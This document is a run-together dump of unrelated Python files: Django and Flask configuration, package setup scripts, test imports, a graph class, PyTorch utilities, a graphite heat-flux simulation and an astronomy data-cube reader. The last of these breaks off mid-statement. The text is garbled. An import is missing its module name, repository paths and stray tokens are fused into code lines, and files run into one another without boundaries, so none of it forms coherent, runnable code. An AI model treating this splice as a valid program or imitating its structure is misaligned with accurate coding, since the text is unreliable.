import * DEBUG = False INSTALLED_APPS += ('mod_wsgi.server',) DATABASES['default'] = dj_database_url.config(conn_max_age=500) STATIC_ROOT = os.getenv('DJANGO_STATIC_ROOT') """ Copyright 2016-2017 Amazon.com, Inc. or its affiliates. All Rights Reserved. Licensed under the Apache License, Version 2.0 (the "License"). You may not use this file except in compliance with the License. A copy of the License is located at http://aws.amazon.com/apache2.0/ or in the "license" file accompanying this file. This file is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. 
""" from setuptools import setup, find_packages setup( name="cfn_flip", version="1.2.2", description="Convert AWS CloudFormation templates between JSON and YAML formats", long_description=open("README.md").read(), long_description_content_type="text/markdown", url="https://github.com/awslabs/aws-cfn-template-flip", author="", author_email="", license="Apache2", packages=find_packages(exclude=["tests"]), install_requires=[ "Click", "PyYAML>=4.1", "six", ], tests_require=[ 'pytest>=4.3.0', 'pytest-cov', 'pytest-runner' ], zip_safe=False, entry_points={ "console_scripts": ["cfn-flip=cfn_flip.main:main"], }, ) 1-10 """Example python 3.x web project with everything from unit testing to continuous deployment.""" __title__ = "minimalpy" __version__ = VERSION = "0.3.0" __author__ = "blankdots" __license__ = "Apache License 2.0" QGB/zmirror # coding=utf-8 from .test_default_mirror import TestDefaultMirror from .test_httpbin import TestHttpbin from .test_verification import TestVerification, TestVerificationSingleAnswer from .test_cache_system import TestCacheSystem from .test_cdn import TestCDN from .test_redirection import TestRedirection from .test_functions import TestFunctions from .test_custom_response_text_rewrite import TestCustomResponseRewriter from .test_developer_functions import TestDeveloperFunctions from .test_non_standard_port import TestNonStandardPort from .test_regex import TestRegex from .test_connection_pool import TestConnectionPool from .test_custom_content_injection import TestContentInjection # Currently this is only used to count the number of question pairs with at least one empty sentence # May think of more useful analysis on the processed tuples at a later point. import numpy as np import cPickle with open("data/data_tuples_glovem.p", "rb") as f: data_tuples = cPickle.load(f) cnt = 0 for idx, tx in enumerate(data_tuples): s1 = tx[0] s2 = tx[1] if len(s1.split()) ==0 : #print idx, "s1", s1 cnt += 1 if len(s2.split()) == 0: #print idx, "s2", s2 cnt += 1 print "Empty sentences num ", cnt Codechef/atm.py w, b = input().split() w = int(w) b = float(b) if (w % 5 == 0 and b>(w+.5)): b = b - w - 0.5 print('%.2f' % b) else: print('%.2f' % b)import pytest as pt import aimsprop as ai def test_compute_population(bundle): # 1. Compute the populations for states. # Test if the computed population at time 25 is correct. pop = ai.compute_population(bundle) assert pop[1][24] == pt.approx(0.441434205, rel=1e-7) class Graph: """ Class to create graph instances. """ def __init__(self): """ Instantiates each graph instance with a table dictionary. """ self._table = {} def add_vertex(self, data): """ Method to add a vertex (node) to a graph with the *data* attribute equal to the argument supplied. """ self._table[data] = {'visited': False, 'neighbors': {}} def add_edge(self, vert_one, vert_two, weight=0): """ Adds an edge between two supplied vertices. """ if vert_one in self._table and vert_two in self._table: self._table[vert_one]['neighbors'][vert_two] = weight self._table[vert_two]['neighbors'][vert_one] = weight else: return None def get_vertices(self): """ Returns a list of vertices found in a graph. Returns None if graph is empty. """ output = [] for key in self._table: output.append(key) if output == []: return None return output def get_neighbors(self, vertex): """ Returns a dictionary of neighbors for the given vertex. Neighbors will be the keys and weights will be the values. 
""" if vertex in self._table: return self._table[vertex]['neighbors'] else: return None def size(self): """ Returns the number of vertices in the graph. """ return len(self._table) class Vertex: """ Class to create a new vertex for a graph. """ def __init__(self, data): """ Initializes an instance of a vertex with a *data* attribute value equal to the argument passed in. """ self.data = data items = ['first item', 'second item', 'third item', 'n item'] for i in items: print(i) # i matches the previous i # Same output, different names for item in items: print(item) # The name you use to iterate an object doesn't # matter for number in range(20): print(number+1) # Returns numbers from 1 to 20 objectc/CNN-with-TensorFlow2.0-and-Keras import matplotlib.pyplot as plt def plot_history(history): # Plot training & validation accuracy values plt.plot(history.history['sparse_categorical_accuracy']) plt.plot(history.history['val_sparse_categorical_accuracy']) plt.title('Model accuracy') plt.ylabel('Accuracy') plt.xlabel('Epoch') plt.legend(['Train', 'Validate'], loc='upper left') plt.show() # Plot training & validation loss values plt.plot(history.history['loss']) plt.plot(history.history['val_loss']) plt.title('Model loss') plt.ylabel('Loss') plt.xlabel('Epoch') plt.legend(['Train', 'Validate'], loc='upper left') plt.show() setup.py import versioneer from setuptools import setup, find_packages setup( version=versioneer.get_version(), cmdclass=versioneer.get_cmdclass(), name='txpasslib', description='Twisted wrapper for passlib', license='Expat', url='https://github.com/mithrandi/txpasslib', author='', author_email='', maintainer='', maintainer_email='', packages=find_packages(where='src'), package_dir={'': 'src'}, zip_safe=True, classifiers=[ 'Development Status :: 3 - Alpha', 'Intended Audience :: Developers', 'Natural Language :: English', 'License :: OSI Approved :: MIT License', 'Operating System :: OS Independent', 'Programming Language :: Python', 'Programming Language :: Python :: 2', 'Programming Language :: Python :: 2.7', 'Programming Language :: Python :: 3', 'Programming Language :: Python :: 3.5', 'Programming Language :: Python :: Implementation :: CPython', 'Programming Language :: Python :: Implementation :: PyPy', 'Topic :: Software Development :: Libraries :: Python Modules', ], install_requires=[ 'attrs>=16.0.0', 'passlib>=1.7.0', 'Twisted>=15.5.0', ], extras_require={ 'test': [ 'testtools>=2.2.0', 'hypothesis>=3.6.0,<6', ], }, ) #!/usr/bin/env python3 import rospy from std_msgs.msg import Float32 import RPi.GPIO as GPIO import time def cb(message): rospy.loginfo(message.data) rospy.init_node('answer_dis') sub = rospy.Subscriber('answer_up', Float32, cb) rospy.spin() sbisdog/multi_taskpublic/imagenet/utils.py import os import torch import logging from logging.handlers import TimedRotatingFileHandler def get_logger(name, log_dir='log'): """ Args: name(str): name of logger log_dir(str): path of log """ if not os.path.exists(log_dir): os.makedirs(log_dir) logger = logging.getLogger(name) logger.setLevel(logging.INFO) info_name = os.path.join(log_dir, '{}.info.log'.format(name)) info_handler = TimedRotatingFileHandler(info_name, when='D', encoding='utf-8') info_handler.setLevel(logging.INFO) error_name = os.path.join(log_dir, '{}.error.log'.format(name)) error_handler = TimedRotatingFileHandler(error_name, when='D', encoding='utf-8') error_handler.setLevel(logging.ERROR) formatter = logging.Formatter( '%(asctime)s - %(name)s - %(levelname)s - %(message)s') 
info_handler.setFormatter(formatter) error_handler.setFormatter(formatter) logger.addHandler(info_handler) logger.addHandler(error_handler) return logger class DataPrefetcher(): def __init__(self, loader): self.loader = iter(loader) self.stream = torch.cuda.Stream() self.preload() def preload(self): try: sample = next(self.loader) self.next_input, self.next_target = sample except StopIteration: self.next_input = None self.next_target = None return with torch.cuda.stream(self.stream): self.next_input = self.next_input.cuda(non_blocking=True) self.next_target = self.next_target.cuda(non_blocking=True) self.next_input = self.next_input.float() def next(self): torch.cuda.current_stream().wait_stream(self.stream) input = self.next_input target = self.next_target self.preload() return input, target class AverageMeter(object): """Computes and stores the average and current value""" def __init__(self): self.reset() def reset(self): self.val = 0 self.avg = 0 self.sum = 0 self.count = 0 def update(self, val, n=1): self.val = val self.sum += val * n self.count += n self.avg = self.sum / self.count def accuracy(output, target, topk=(1, )): """Computes the accuracy over the k top predictions for the specified values of k""" with torch.no_grad(): maxk = max(topk) batch_size = target.size(0) _, pred = output.topk(maxk, 1, True, True) pred = pred.t() correct = pred.eq(target.view(1, -1).expand_as(pred)) res = [] for k in topk: correct_k = correct[:k].view(-1).float().sum(0, keepdim=True) res.append(correct_k.mul_(100.0 / batch_size)) return resabdullahturkak/Django-pc-login-and-show from django.apps import AppConfig class GirisConfig(AppConfig): name = 'giris' flask_online_store/views/api/product.py from flask import Blueprint, render_template, session, redirect, url_for, request, flash, g, jsonify, abort from flask_restful import Resource class ProductView(Resource): def get(self, id=None): return {'test': 'hello, word from product'} def post(self, id=None): return {'test': 'hello, word from product'} def put(self, id=None): return {'test': 'hello, word'} def delete(self, id=None): return {'test': 'hello, word'} layerserver/migrations/0025_auto_20190326_1352.py1-10 # Generated by Django 2.1.7 on 2019-03-26 13:52 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('layerserver', '0024_auto_20190326_1337'), ] operations = [ migrations.AddField( model_name='databaselayer', name='form_fields', field=models.TextField(blank=True, null=True), ), migrations.AddField( model_name='databaselayer', name='list_fields', field=models.TextField(blank=True, null=True), ), ] import h5py import numpy as np import matplotlib.pylab as plt import pandas as pd import os from matplotlib import ticker from heat_flux_adi import simulate_adi_temp from scipy.signal import savgol_filter import matplotlib as mpl import json import ir_thermography.thermometry as irt import re import shutil import platform from scipy.optimize import OptimizeResult from scipy.optimize import least_squares from scipy.linalg import svd from scipy import interpolate base_path = r'C:\Users\erick\OneDrive\Documents\ucsd\Postdoc\research\data\firing_tests\IR_VS_POWER\graphite' filetag = 'graphite_simulated_surface_temperature' load_model = True saved_h5 = 'ADI_k1_7.41E-01_chi_0.60_P4.80E+03' time_constant = 1.5#2.1148 # time_constant = 0.5 # qmax = 5.55E3 * 0.65 qmax = 4.80E3 * 1.0 emissivity = 1.0 - (36.9 / 100) reflectance = 40.4 M = 200 # number of intervals in r N = 400 # the number of intervals in x R = 
1.27*0.75 # The radius of the cylinder in cm R_sample = 0.5 * (3.0/8.0) * 2.54 #1.288 # L = 2.5 # the length of the cylinder holder_thickness = 1.27 dt = 1.0E-3 beam_diameter = 1.5 * 0.8165 # cm probe_size = 2.0 # mm thermography_spot_diameter = 0.8 # cm # thermography_spot_diameter = R_sample # density_g = 1.76 # g / cm^3 # GR008G # density_g = 1.81 # g / cm^3 # GR001CC density_g = 1.698 """ It has been found that the values of heat capacity for all types of natural and manufactured graphites are basically the same, except near absolute-zero temperatures. https://www.goodfellow.com/us/en-us/displayitemdetails/p/c-00-rd-000130/carbon-rod and https://poco.entegris.com/content/dam/poco/resources/reference-materials/brochures/brochure-graphite-properties-and-characteristics-11043.pdf """ # specific_heat_g = 0.712 # J / g / K specific_heat_g = 0.6752 # , et al., 1973 k0_1 = 85E-2 # W / (cm K) https://www.graphitestore.com/core/media/media.nl?id=6310&c=4343521&h=Tz5uoWvr-nhJ13GL1b1lG8HrmYUqV1M_1bOTFQ2MMuiQapxt # GR001C # k0_1 = 130E-2 # W / (cm K) https://www.graphitestore.com/core/media/media.nl?id=7164&c=4343521&h=8qpl24Kn0sh2rXtzPvd5WxQIPQumdO8SE5m3VRfVBFvLJZtj # GR008G # k0_1 = 200E-2 k0_2 = 16.2E-2 # W / (cm K) # kappa_1 = 1.11 # Thermal diffusivity of copper in cm^2/s # kappa_1 = 25E-2 # Thermal diffusivity of polycrystalline graphite in cm^2/s kappa_1 = k0_1 / (density_g * specific_heat_g) kappa_2 = 4.5E-2 # Thermal diffusivity of steel in cm^2/s chi = 1.0 - (reflectance / 100.0) T_a = 20.0 pulse_length = 2.0 t_max = 4.01 x_tc_1 = 1.0 x_tc_2 = 2.0 # Kim Argonne National Lab 1965 def cp_ss304l(temperature): return 4.184 * (0.1122 + 3.222E-5 * temperature) def rho_ss304l(temperature): return 7.9841 - 2.6506E-4 * temperature - 1.1580E-7 * temperature ** 2.0 def thermal_conductivity_ss304l(temperature): return 8.11E-2 + 1.618E-4 * temperature k0_2 = thermal_conductivity_ss304l(T_a + 273.15) cp_2 = cp_ss304l(T_a + 273.15) rho_2 = rho_ss304l(T_a + 273.15) kappa_2 = k0_2 / (cp_2 * rho_2) def get_experiment_params(relative_path: str, filename: str): # Read the experiment parameters results_csv = os.path.join(relative_path, f'{filename}.csv') count = 0 params = {} with open(results_csv) as f: for line in f: if line.startswith('#'): if count > 1: l = line.strip() print(l) if l == '#Data:': break pattern1 = re.compile("\s+(.*?):\s(.*?)\s(.*?)$") pattern2 = re.compile("\s+(.*?):\s(.*?)$") matches1 = pattern1.findall(l) matches2 = pattern2.findall(l) if len(matches1) > 0: params[matches1[0][0]] = { 'value': matches1[0][1], 'units': matches1[0][2] } elif len(matches2) > 0: params[matches2[0][0]] = { 'value': matches2[0][1], 'units': '' } count += 1 return params def correct_thermocouple_response(measured_temperature, measured_time, tau): n = len(measured_time) k = int(n / 15) k = k + 1 if k % 2 == 0 else k k = max(k, 5) # T = savgol_filter(measured_temperature, k, 3) # dTdt = np.gradient(T, measured_time, edge_order=2) delta = measured_time[1] - measured_time[0] dTdt = savgol_filter(x=measured_temperature, window_length=k, polyorder=4, deriv=1, delta=delta) # dTdt = savgol_filter(dTdt, k - 2, 3) r = measured_temperature + tau * dTdt return savgol_filter(r, k - 4, 3) def fobj(beta: np.ndarray, tc: np.ndarray, tc_time: np.ndarray, y: np.ndarray) -> np.ndarray: return correct_thermocouple_response(tc, tc_time, beta[0]) - y def get_pcov(res: OptimizeResult) -> np.ndarray: popt = res.x ysize = len(res.fun) cost = 2 * res.cost # res.cost is half sum of squares! 
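# Minimal sketch, illustrative only: correct_thermocouple_response above applies
# the first-order sensor model tau * dT_meas/dt + T_meas = T_true, i.e.
# T_true ~ T_meas + tau * dT_meas/dt, using a Savitzky-Golay derivative.
# The stripped-down version below (hypothetical name) uses a plain
# finite-difference gradient and no smoothing.
import numpy as np

def correct_first_order_lag(t, temp_measured, tau):
    """Undo a first-order sensor lag with time constant tau (same time units as t)."""
    dTdt = np.gradient(temp_measured, t, edge_order=2)
    return temp_measured + tau * dTdt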
s_sq = cost / (ysize - popt.size) # Do Moore-Penrose inverse discarding zero singular values. _, s, VT = svd(res.jac, full_matrices=False) threshold = np.finfo(float).eps * max(res.jac.shape) * s[0] s = s[s > threshold] VT = VT[:s.size] pcov = np.dot(VT.T / s ** 2, VT) pcov = pcov * s_sq if pcov is None: # indeterminate covariance print('Failed estimating pcov') pcov = np.zeros((len(popt), len(popt)), dtype=float) pcov.fill(np.inf) return pcov if __name__ == "__main__": adi_data_dir = os.path.join(os.path.join(base_path, 'adi_data')) with open('plot_style.json', 'r') as file: json_file = json.load(file) plot_style = json_file['defaultPlotStyle'] mpl.rcParams.update(plot_style) if not load_model: hf_file = simulate_adi_temp( laser_power=qmax, r_holder=R, r_sample=R_sample, length=L, kappa_1=kappa_1, kappa_2=kappa_2, k0_1=k0_1, k0_2=k0_2, r_points=M, x_points=N, pulse_length=pulse_length, dt=dt, chi=chi, T_a=T_a, t_max=t_max, report_every=20, debug=True, holder_thickness_cm=holder_thickness, save_h5=True, beam_diameter=beam_diameter, x_tc_1=x_tc_1, x_tc_2=x_tc_2, emissivity=1.0 ) if not os.path.exists(adi_data_dir): os.makedirs(adi_data_dir) shutil.move(hf_file + '.h5', os.path.join(adi_data_dir, hf_file + '.h5')) else: hf_file = saved_h5 dr = R / M dx = L / N probe_size_idx = int(probe_size * 0.1 / dx) probe_idx_delta = int(0.5 * probe_size_idx) x = dx * np.arange(0, N + 1) r = dr * np.arange(0, M + 1) msk_holder = r > R_sample idx_r = (np.abs(r - R_sample)).argmin() idx_pd_spot = (np.abs(r - thermography_spot_diameter * 0.5)).argmin() print(f'IR Thermography spot size: {thermography_spot_diameter * 10.0:.1f} mm') print(f'IDX of photodiode spot: {idx_pd_spot}, radius at index: {r[idx_pd_spot] * 10:.1f} mm') # Get the size of the time array elapsed_time = np.arange(0, t_max + dt, dt, dtype=np.float64) # The temperature at the surface of the rod closest to the light source tp1 = T_a * np.ones_like(elapsed_time) xp1 = x_tc_1 idx_p1 = int(xp1 / dx) # The temperature at the surface of the rod farther from the light source tp2 = T_a * np.ones_like(elapsed_time) xp2 = x_tc_2 idx_p2 = int(xp2 / dx) # Stefan-Boltzmann constant sb = 5.670374419E-12 # W cm^{-2} K^{-4} # The average temperature at the front surfacve t_front = T_a * np.ones_like(elapsed_time) # The temperature at the back surface t_back = T_a * np.ones_like(elapsed_time) # radiated power radiated_power = np.empty_like(t_back) hf_file_path = os.path.join(adi_data_dir, hf_file + '.h5') with h5py.File(hf_file_path, 'r') as hf: x = np.array(hf['data/x']) r = np.array(hf['data/r']) for i in range(len(tp1)): ds_name = f'data/T_{i:d}' with h5py.File(hf_file_path, 'r') as hf: u = np.array(hf.get(ds_name)) tp1[i] = u[idx_r, idx_p1 - probe_idx_delta:idx_p1 + probe_idx_delta].mean() tp2[i] = u[idx_r, idx_p2] t_front[i] = u[0:idx_pd_spot, 0:3].mean() radiated_power[i] = sb * emissivity * ((t_front[i] + 273.15) ** 4.0 - (T_a + 273.15) ** 4.0) t_back[i] = u[0, -1] fig, ax = plt.subplots(ncols=1) # , constrained_layout=True) fig.set_size_inches(5.0, 3.5) p0 = 0.5 * np.pi * qmax * (0.5 * beam_diameter) ** 2.0 estimated_power_density = p0 * (1.0 - np.exp(-2.0 * (2.0 * R_sample / beam_diameter) ** 2.0)) ax.plot(elapsed_time, t_front, label=f'Q={estimated_power_density * 0.01:.1f} MW/m$^{{\\mathregular{{2}}}}$, x=0.0 cm', c='tab:red', ls='-') leg = ax.legend( loc='best', ncol=1, frameon=False ) ax.tick_params(axis='y', right=True, zorder=10, which='both') ax.set_xlabel('Time (s)') ax.set_ylabel('Temperature (°C)') ax.set_xlim((0., 4.0)) 
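# Minimal sketch, illustrative only: radiated_power above is the grey-body
# Stefan-Boltzmann loss q = sigma * emissivity * (T_surface^4 - T_ambient^4),
# with temperatures converted to kelvin and sigma in W cm^-2 K^-4 to match the
# units used in this script. The helper name below is an assumption.
SIGMA_SB_CM = 5.670374419E-12  # W cm^-2 K^-4

def radiative_flux(t_surface_c, t_ambient_c, emissivity):
    """Net radiated power per unit area (W/cm^2) from a grey surface."""
    ts, ta = t_surface_c + 273.15, t_ambient_c + 273.15
    return SIGMA_SB_CM * emissivity * (ts ** 4 - ta ** 4)
# radiative_flux(1200.0, 20.0, 0.631) is roughly 17 W/cm^2.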
ax.set_ylim(bottom=0.0) ax.xaxis.set_minor_locator(ticker.MultipleLocator(0.25)) ax.yaxis.set_major_locator(ticker.MultipleLocator(400)) ax.yaxis.set_minor_locator(ticker.MultipleLocator(100)) fig.tight_layout() fig.savefig(os.path.join(base_path, f'{filetag}_adi_raw_fit.png'), dpi=600) print(f"Filename: {hf_file}") plt.show() """Application configuration.""" import ast import os os_env = os.environ class Config(object): """Base configuration.""" SECRET_KEY = os.environ.get( 'WHATIFSTOCKS_SECRET', 'secret-key') APP_DIR = os.path.abspath(os.path.dirname(__file__)) # This directory SQLALCHEMY_DATABASE_URI = os_env.get( 'WHATIFSTOCKS_DATABASE_URI', 'postgresql://localhost/example') ASSETS_DEBUG = False DEBUG_TB_ENABLED = False # Disable Debug toolbar DEBUG_TB_INTERCEPT_REDIRECTS = False SQLALCHEMY_TRACK_MODIFICATIONS = False SITE_NAME = 'What If Stocks' ADMINS = (os_env.get('WHATIFSTOCKS_ADMINS') and os_env.get('WHATIFSTOCKS_ADMINS').split(',') or []) MAIL_DEFAULT_SENDER = os_env.get( 'WHATIFSTOCKS_MAIL_DEFAULT_SENDER', '') MAIL_SERVER = os_env.get( 'WHATIFSTOCKS_MAIL_SERVER', 'localhost') MAIL_PORT = ( os_env.get('WHATIFSTOCKS_MAIL_PORT') and ast.literal_eval(os_env.get('WHATIFSTOCKS_MAIL_PORT')) or 25) MAIL_USE_TLS = ( os_env.get('WHATIFSTOCKS_MAIL_USE_TLS') and ast.literal_eval( os_env.get('WHATIFSTOCKS_MAIL_USE_TLS')) or False) MAIL_USE_SSL = ( os_env.get('WHATIFSTOCKS_MAIL_USE_SSL') and ast.literal_eval( os_env.get('WHATIFSTOCKS_MAIL_USE_SSL')) or False) MAIL_USERNAME = os_env.get('WHATIFSTOCKS_MAIL_USERNAME', None) MAIL_PASSWORD = os_env.get('WHATIFSTOCKS_MAIL_PASSWORD', None) MAILGUN_DOMAIN = os_env.get('WHATIFSTOCKS_MAILGUN_DOMAIN', None) MAILGUN_KEY = os_env.get('WHATIFSTOCKS_MAILGUN_KEY', None) MAILGUN_LOGGING_SENDER = MAIL_DEFAULT_SENDER MAILGUN_LOGGING_RECIPIENT = ADMINS MAIL_ERROR_SUBJECT_TEMPLATE = os_env.get( 'WHATIFSTOCKS_MAIL_ERROR_SUBJECT_TEMPLATE', '[{0}] Error report: {1}') SESSION_COOKIE_NAME = 'whatifstocks_session' REMEMBER_COOKIE_NAME = 'whatifstocks_remember_token' ERROR_MAIL_FORMAT = ( '\n' 'Message type: %(levelname)s\n' 'Location: %(pathname)s:%(lineno)d\n' 'Module: %(module)s\n' 'Function: %(funcName)s\n' 'Time: %(asctime)s\n' '\n' 'Message:\n' '\n' '%(message)s\n') STOCKANALYSIS_MONTHLY_PRICES_URL_PATTERN = os_env.get( 'WHATIFSTOCKS_STOCKANALYSIS_MONTHLY_PRICES_URL_PATTERN', ( 'https://www.alphavantage.co/query?' 
'function=TIME_SERIES_MONTHLY_ADJUSTED&symbol={0}.{1}&' 'apikey={2}')) STOCKANALYSIS_ALPHAVANTAGE_APIKEY = os_env.get( 'WHATIFSTOCKS_STOCKANALYSIS_ALPHAVANTAGE_APIKEY', '') class ProdConfig(Config): """Production configuration.""" ENV = 'prod' DEBUG = False DEBUG_TB_ENABLED = False # Disable Debug toolbar class DevConfig(Config): """Development configuration.""" ENV = 'dev' DEBUG = True DEBUG_TB_ENABLED = True ASSETS_DEBUG = True # Don't bundle/minify static assets class TestConfig(Config): """Test configuration.""" TESTING = True DEBUG = True import matplotlib.pyplot as plt import numpy as np import time import gzip from astropy.io import fits from epsDetectS import epsDetect from matplotlib.colors import LogNorm from mpl_toolkits.axes_grid1 import AxesGrid from pseudoVoigt import pseudoVoigt # Quentin's version from reid19_rotation import rotcurve, R0, V0 from MW_utils import lbd2vlsr from scipy.io import loadmat import pdb def add_inner_title(ax, title, loc, size=None, **kwargs): from matplotlib.offsetbox import AnchoredText from matplotlib.patheffects import withStroke if size is None: size = dict(size=plt.rcParams['legend.fontsize']) at = AnchoredText(title, loc=loc, prop=size, pad=0., borderpad=0.5, frameon=False, **kwargs) ax.add_artist(at) at.txt._text.set_path_effects([withStroke(foreground="w", linewidth=3)]) return at class gascube: def __init__(self, filename, int2col=1., Ts=-10, fitres_files=None): hdus = fits.open(filename) # store header self.header = hdus[0].header # read the axis type and mapping values naxis = self.header.get('NAXIS') self.atlas = {} self.refpix = {} self.refval = {} self.delta = {} self.naxis = {} for i in range(naxis): if (self.header.get('CTYPE' + str(i + 1)) == 'GLON-CAR'): self.atlas['longitude'] = i + 1 self.refpix['longitude'] = self.header.get( 'CRPIX' + str(i + 1)) - 1 self.refval['longitude'] = self.header.get('CRVAL' + str(i + 1)) self.delta['longitude'] = self.header.get('CDELT' + str(i + 1)) self.naxis['longitude'] = self.header.get('NAXIS' + str(i + 1)) if (self.header.get('CTYPE' + str(i + 1)) == 'GLAT-CAR'): self.atlas['latitude'] = i + 1 self.refpix['latitude'] = self.header.get( 'CRPIX' + str(i + 1)) - 1 self.refval['latitude'] = self.header.get('CRVAL' + str(i + 1)) self.delta['latitude'] = self.header.get('CDELT' + str(i + 1)) self.naxis['latitude'] = self.header.get('NAXIS' + str(i + 1)) if (self.header.get( 'CTYPE' + str(i + 1)) == 'VELO-LSR' or self.header.get( 'CTYPE' + str(i + 1)) == 'VELO-LSRK' or self.header.get( 'CTYPE' + str(i + 1)) == 'VEL' or self.header.get( 'CTYPE' + str(i + 1)) == 'VRAD'): # initialise velocity unit self.vscale = 1. self.atlas['velocity'] = i + 1 self.refpix['velocity'] = self.header.get( 'CRPIX' + str(i + 1)) - 1 self.refval['velocity'] = self.header.get('CRVAL' + str(i + 1)) self.delta['velocity'] = self.header.get('CDELT' + str(i + 1)) self.naxis['velocity'] = self.header.get('NAXIS' + str(i + 1)) # check if velocity unit is stored in comment if 'M/S' in self.header.comments['CDELT' + str(i + 1)]: self.vscale = 1.e3 if 'KM/S' in self.header.comments['CDELT' + str(i + 1)]: self.vscale = 1. 
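# Minimal sketch, illustrative only: the header bookkeeping above stores
# refpix = CRPIX - 1 so that, for a linear FITS axis addressed with 0-based
# pixels, world = CRVAL + CDELT * (pixel - (CRPIX - 1)), which is what
# pix2coord below evaluates. The standalone helper name is hypothetical.
def linear_axis_world(pixel, crval, cdelt, crpix):
    """World coordinate of a 0-based pixel index on a linear FITS axis."""
    return crval + cdelt * (pixel - (crpix - 1.0))
# linear_axis_world(0, crval=10.0, cdelt=0.5, crpix=1.0) == 10.0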
# check if velocity unit is defined by dedicated key # key takes precedence over comment try: u = self.header.get('CUNIT' + str(i + 1)) if u == 'M/S' or u == 'm/s' or u == 'm s-1': self.vscale = 1.e3 else: pass except: pass # find the value assigned to blank pixels try: bzero = self.header.get('BZERO') bscale = self.header.get('BSCALE') blank = self.header.get('BLANK') blankvalue = bzero + bscale * blank except: blankvalue = -10000 # open data and set to 0 blank pixels self.data = hdus[0].data if naxis == 3: self.data = hdus[0].data elif naxis == 4: self.data = hdus[0].data[0, :, :, :] else: print("ERROR, anomalous number of axes in FITS file", filename) self.data = np.nan_to_num(self.data) self.data[self.data <= (blankvalue + 0.1)] = 0. self.int2col = int2col self.Ts = Ts # default=-10 is optically thin approx # read fit results file if available, and set bool to True self.fitres = {} self.fitres['available'] = False if not fitres_files == None: try: fitres = np.load(fitres_files[0]) fitdiag = np.load(fitres_files[1]) self.fitres['available'] = True except: try: fitres = loadmat(fitres_files[0]) fitdiag = loadmat(fitres_files[1]) self.fitres['available'] = True except: pass if self.fitres['available']: self.fitres['vlin'] = fitres['vlin'] self.fitres['hfit'] = fitres['hfit'] self.fitres['vfit'] = fitres['vfit'] self.fitres['svfit'] = fitres['svfit'] self.fitres['etafit'] = fitres['etafit'] self.fitres['aic'] = fitdiag['aic'] if self.delta['longitude'] < 0.: # reverse axis self.fitres['vlin'] = self.fitres['vlin'][::-1, :, :] self.fitres['hfit'] = self.fitres['hfit'][::-1, :, :] self.fitres['vfit'] = self.fitres['vfit'][::-1, :, :] self.fitres['svfit'] = self.fitres['svfit'][::-1, :, :] self.fitres['etafit'] = self.fitres['etafit'][::-1, :, :] self.fitres['aic'] = self.fitres['aic'][::-1, :] def pix2coord(self, pixel, name): # transform pixel value into coordinate value for a given coordinate coordinate = self.refval[name] + self.delta[name] * ( pixel - self.refpix[name]) return coordinate def coord2pix(self, coordinate, name): # transform coordinate value into pixel value for a given coordinate pixel = int(round(self.refpix[name] + (1. 
/ self.delta[name]) * ( coordinate - self.refval[name]))) return pixel def getValue(self, ll, bb, vv): # get the value in the cube corresponding to the pixels ll (longitude), # bb (latitude), vv (velocity ) vec = [0, 0, 0] vec[self.atlas['longitude'] - 1] = ll vec[self.atlas['latitude'] - 1] = bb vec[self.atlas['velocity'] - 1] = vv value = self.data[vec[2], vec[1], vec[0]] return value def getLineData(self, l, b, vmin, vmax): # extract the line data in agiven direction nbins = int( self.vscale * (vmax - vmin) / abs(self.delta['velocity'])) + 1 vdir = int(self.delta['velocity'] / abs(self.delta['velocity'])) vel = np.array([]) Tb = np.array([]) ll = self.coord2pix(l, 'longitude') bb = self.coord2pix(b, 'latitude') vvmin = self.coord2pix(self.vscale * vmin, 'velocity') for s in range(nbins): vv = int(vvmin + vdir * s) vel = np.append(vel, self.pix2coord(vv, 'velocity')) val = self.getValue(ll, bb, vv) Tb = np.append(Tb, val) vel /= self.vscale return vel, Tb def find_anomalies(self,T_thresh, outfilename): idx = np.where(self.data < T_thresh) f = open(outfilename,'w') N = np.shape(idx)[1] for s in range(N): lon = self.pix2coord(idx[3- self.atlas['longitude']][s],'longitude') lat = self.pix2coord(idx[3 - self.atlas['latitude']][s], 'latitude') vel = self.pix2coord(idx[3 - self.atlas['velocity']][s], 'velocity')/self.vscale f.write('{},{},{}\n'.format(lon,lat,vel)) f.close() def getFitResults(self, l, b, vmin, vmax): nbins = int( self.vscale * (vmax - vmin) / abs(self.delta['velocity'])) + 1 vdir = int(self.delta['velocity'] / abs(self.delta['velocity'])) il = self.coord2pix(l, 'longitude') ib = self.coord2pix(b, 'latitude') vvmin = self.coord2pix(self.vscale * vmin, 'velocity') vel = np.array([]) for s in range(nbins): vv = int(vvmin + vdir * s) vel = np.append(vel, self.pix2coord(vv, 'velocity')) vel /= self.vscale Tfit = np.zeros(nbins) nlin = np.sum(self.fitres['hfit'][il, ib, :] != 0.) 
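# Minimal sketch, illustrative only: getFitResults sums pseudo-Voigt components
# via the imported pseudoVoigt helper. A common convention (the imported
# routine may normalise the width differently) mixes a Lorentzian and a
# Gaussian of equal FWHM with weight eta, both peak-normalised to the height:
import numpy as np

def pseudo_voigt_profile(height, center, fwhm, eta, x):
    gamma = fwhm / 2.0                                  # Lorentzian half-width
    sigma = fwhm / (2.0 * np.sqrt(2.0 * np.log(2.0)))   # Gaussian sigma with the same FWHM
    lor = 1.0 / (1.0 + ((x - center) / gamma) ** 2)
    gau = np.exp(-0.5 * ((x - center) / sigma) ** 2)
    return height * (eta * lor + (1.0 - eta) * gau)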
PV = np.zeros((nbins, nlin)).astype('float32') if nlin != 0: for klin in range(nlin): PV[:, klin] = pseudoVoigt(self.fitres['hfit'][il, ib, klin], self.fitres['vfit'][il, ib, klin], self.fitres['svfit'][il, ib, klin], self.fitres['etafit'][il, ib, klin], vel) Tfit = np.sum(PV, axis=1).astype('float32') aic = self.fitres['aic'][il, ib] return vel, self.fitres['vfit'][il, ib, :], PV, Tfit, aic def line(self, l, b, vmin, vmax, vcuts=False, dcuts=False, cutfile = False, plotFit=False, lineDtc=False, lng=2, lis=1, sig=2.5, thresh=3., fitLine=False): vel, Tb = self.getLineData(l, b, vmin, vmax) self.ax = plt.subplot(111) self.ax.plot(vel, Tb, linewidth=0, color='k', marker='o', markersize=3) self.ax.set_xlabel('$V_\mathrm{LSR}$ (km s$^{-1}$)') self.ax.set_ylabel('$T_\mathrm{B}$ (K)') if vcuts: for s, vrange in enumerate(vcuts): lon = l lat = b vmin = eval(vrange[0]) vmax = eval(vrange[1]) plt.axvline(vmin, color='k') plt.axvline(vmax, color='k') elif dcuts: for bound in dcuts: lon = l lat = b vlsr = lbd2vlsr(lon, lat, 